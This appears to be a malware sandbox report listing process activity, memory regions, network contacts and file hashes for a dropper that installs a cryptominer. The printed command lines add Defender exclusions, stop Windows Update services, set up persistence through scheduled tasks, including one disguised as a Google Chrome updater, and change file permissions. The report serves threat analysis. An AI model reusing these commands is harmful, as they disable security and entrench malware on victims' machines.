PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4048 wrote to memory of 4812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 4812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 3924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 3924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4116 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
NL 194.180.49.153:80 194.180.49.153 tcp
US 8.8.8.8:53 208.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 153.49.180.194.in-addr.arpa udp
SG 128.199.192.86:81 tcp
US 8.8.8.8:53 86.192.199.128.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 206.189.229.43:80 206.189.229.43 tcp
US 8.8.8.8:53 43.229.189.206.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp

Files

memory/3752-122-0x0000000000CF0000-0x0000000001791000-memory.dmp

memory/3752-121-0x00000000017F0000-0x00000000017F1000-memory.dmp

memory/3752-124-0x0000000000CF0000-0x0000000001791000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/3752-134-0x0000000000CF0000-0x0000000001791000-memory.dmp

memory/1432-135-0x0000000000600000-0x0000000000601000-memory.dmp

memory/1432-136-0x0000000000980000-0x0000000001421000-memory.dmp

memory/1432-138-0x0000000000980000-0x0000000001421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\148472871111

MD5 08bca14f9665e531d134ede3f5e67903
SHA1 9293b10128d06c63b519b0c116b11f1884477578
SHA256 a00bad50528a4c4b717ada6f76c38546f54bf64acd809d6265282e3f279032ba
SHA512 1a362d5ee037f21e4a284d7cf7ed829e055a87164432c570fbef61dab1965daca98f4a2b07ff47327ddbffc375fe182a03ee7574d06dd428cf8eae2c10c1c79b

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

memory/3444-166-0x00000000008E0000-0x0000000000B26000-memory.dmp

memory/3444-167-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-168-0x0000000005320000-0x00000000053BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/4804-181-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-183-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/4804-182-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/1432-184-0x0000000000980000-0x0000000001421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/4804-198-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4152-199-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4804-200-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-201-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-202-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-203-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-204-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/3444-205-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-207-0x00000000055B0000-0x00000000055C0000-memory.dmp

memory/3444-206-0x0000000005290000-0x00000000052AC000-memory.dmp

memory/3444-208-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-209-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-211-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-213-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-215-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-217-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-219-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-221-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-223-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-225-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-227-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-229-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-231-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/4804-232-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/3444-233-0x00000000052E0000-0x00000000052E1000-memory.dmp

memory/4132-234-0x0000000000400000-0x000000000045A000-memory.dmp

memory/4132-236-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-237-0x0000000072040000-0x000000007272E000-memory.dmp

memory/4132-238-0x0000000007DA0000-0x000000000829E000-memory.dmp

memory/4132-239-0x0000000007940000-0x00000000079D2000-memory.dmp

memory/4152-240-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-242-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/4132-241-0x00000000078C0000-0x00000000078CA000-memory.dmp

memory/4152-243-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-246-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/4152-244-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-247-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-249-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-248-0x0000000007AE0000-0x0000000007AF2000-memory.dmp

memory/4132-250-0x0000000007C30000-0x0000000007D3A000-memory.dmp

memory/4132-245-0x00000000088B0000-0x0000000008EB6000-memory.dmp

memory/4152-251-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-253-0x0000000007B60000-0x0000000007B9E000-memory.dmp

memory/4152-252-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-255-0x0000000007BA0000-0x0000000007BEB000-memory.dmp

memory/4152-254-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-256-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-257-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-258-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4804-260-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/836-264-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

memory/836-265-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-266-0x000001E897100000-0x000001E897110000-memory.dmp

memory/4152-267-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/836-268-0x000001E8AF690000-0x000001E8AF6B2000-memory.dmp

memory/836-271-0x000001E8AF940000-0x000001E8AF9B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fblvsv15.mta.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4132-282-0x0000000008390000-0x00000000083F6000-memory.dmp

memory/836-285-0x000001E897100000-0x000001E897110000-memory.dmp

memory/4152-289-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-303-0x0000000072040000-0x000000007272E000-memory.dmp

memory/4132-304-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/4152-305-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/836-307-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

memory/4132-313-0x00000000097F0000-0x0000000009866000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/4132-315-0x0000000005490000-0x00000000054AE000-memory.dmp

memory/4152-318-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/836-319-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-320-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-324-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/5040-329-0x00007FFEA0570000-0x00007FFEA0F5C000-memory.dmp

memory/5040-332-0x000001A619770000-0x000001A619780000-memory.dmp

memory/5040-333-0x000001A619770000-0x000001A619780000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a3b478be233e5a021e8d23a4c78e262
SHA1 3098e038146c5a4186c24d2c92dba034abad77fd
SHA256 8eaa61f261f7f63a6cd8cd35c2930aa12faffd28fed94e15006fb5e47cf341a2
SHA512 b3e2a4b293edea053b71e7ae724feb1c995ea129b7adfd2851d595d721da15ca33a8500743d8a7083ad622c5c003d3153b8a4d0747e51fb9d8fe610bc67cbc3b

memory/5040-349-0x000001A619770000-0x000001A619780000-memory.dmp

memory/4132-364-0x000000000A950000-0x000000000AB12000-memory.dmp

memory/4132-365-0x000000000B050000-0x000000000B57C000-memory.dmp

memory/4804-366-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/5040-373-0x000001A619770000-0x000001A619780000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 2f75eb4060f276ad55e2476f80acd9bb
SHA1 354f3ec64ea5635b708d974b6f6544241a6968d0
SHA256 3534a8ae56136f143b10c7781f7fa9f6832fcdd5bd07efeabbd56b0fea974ac6
SHA512 24962d877999f19dfa29f9f927b7fd5ad37587ada486919a4b2b49942331169b7e3e7033c9c60e9e468fde1aae0fcc11a5a0c92193ccbc61ce0b7ca89f0c9820

memory/4152-372-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/1316-376-0x0000000000820000-0x0000000001163000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 2f75eb4060f276ad55e2476f80acd9bb
SHA1 354f3ec64ea5635b708d974b6f6544241a6968d0
SHA256 3534a8ae56136f143b10c7781f7fa9f6832fcdd5bd07efeabbd56b0fea974ac6
SHA512 24962d877999f19dfa29f9f927b7fd5ad37587ada486919a4b2b49942331169b7e3e7033c9c60e9e468fde1aae0fcc11a5a0c92193ccbc61ce0b7ca89f0c9820

memory/4152-377-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-378-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-379-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-380-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-383-0x0000000000820000-0x0000000001163000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1316-386-0x0000000000820000-0x0000000001163000-memory.dmp

memory/4804-388-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-390-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-389-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-391-0x0000000000820000-0x0000000001163000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/5040-384-0x00007FFEA0570000-0x00007FFEA0F5C000-memory.dmp

memory/1384-397-0x00007FF72E5C0000-0x00007FF72F40A000-memory.dmp

memory/1316-398-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1384-399-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/2564-410-0x0000000000980000-0x0000000001421000-memory.dmp

memory/2564-411-0x0000000000790000-0x0000000000791000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 573d77d4e77a445f5db769812a0be865
SHA1 7473d15ef2d3c6894edefd472f411c8e3209a99c
SHA256 5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512 af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 631f4b3792b263fdda6b265e93be4747
SHA1 1d6916097d419198bfdf78530d59d0d9f3e12d45
SHA256 4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512 e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 5f5aa607657efd596f2ba27625bb7ed4
SHA1 6818e799afcb486fa9416eb29468c10f7a051d88
SHA256 f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b
SHA512 0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb